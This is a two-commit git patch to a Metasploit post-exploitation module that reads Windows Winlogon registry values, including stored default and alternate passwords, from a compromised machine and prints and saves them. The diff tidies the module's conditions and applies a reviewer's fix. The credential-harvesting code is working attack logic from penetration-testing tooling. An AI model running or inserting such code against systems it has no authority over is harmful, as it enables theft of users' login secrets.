From 0d3f5ae22085ec23f3ec4a45b3349ab444f2a050 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 18 Jul 2017 22:50:34 +0200 Subject: [PATCH 1/2] cleanup windows_autologin --- .../gather/credentials/windows_autologin.rb | 22 +++++-------------- 1 file changed, 6 insertions(+), 16 deletions(-) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 0cf6f1170f..2ef17660bf 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -45,8 +45,6 @@ class MetasploitModule < Msf::Post has_al = 0 - # DefaultDomainName, DefaultUserName, DefaultPassword - # AltDefaultDomainName, AltDefaultUserName, AltDefaultPassword logon_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\" al = registry_getvaldata(logon_key, "AutoAdminLogon") || '' @@ -58,24 +56,16 @@ class MetasploitModule < Msf::Post du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || '' dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || '' - if do1 != '' and du1 != '' and dp1 == '' and al == '1' + if do1 != '' && du1 != '' && dp1 == '' has_al = 1 - creds << [du1,dp1, do1] - print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") - elsif do1 != '' and du1 != '' and dp1 != '' - has_al = 1 - creds << [du1,dp1, do1] - print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") + creds << [du1, dp1, do1] + print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") end - if do2 != '' and du2 != '' and dp2 == '' and al == '1' + if do2 != '' && du2 != '' && dp2 == '' has_al = 1 - creds << [du2,dp2,do2] - print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") - elsif do2 != '' and du2 != '' and dp2 != '' - has_al = 1 - creds << [du2,dp2,do2] - print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") + creds << [du2, dp2, do2] + print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") end if has_al == 0 From b4bb384577329eaf363a19d54510d9a61d2e296e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 22 Jul 2017 18:54:36 +0200 Subject: [PATCH 2/2] add @pbarry-r7 's feedback --- modules/post/windows/gather/credentials/windows_autologin.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 2ef17660bf..6384e5786a 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -56,13 +56,13 @@ class MetasploitModule < Msf::Post du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || '' dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || '' - if do1 != '' && du1 != '' && dp1 == '' + if do1 != '' && du1 != '' && (dp1 != '' || (dp1 == '' && al == '1')) has_al = 1 creds << [du1, dp1, do1] print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") end - if do2 != '' && du2 != '' && dp2 == '' + if do2 != '' && du2 != '' && (dp2 != '' || (dp2 == '' && al == '1')) has_al = 1 creds << [du2, dp2, do2] print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")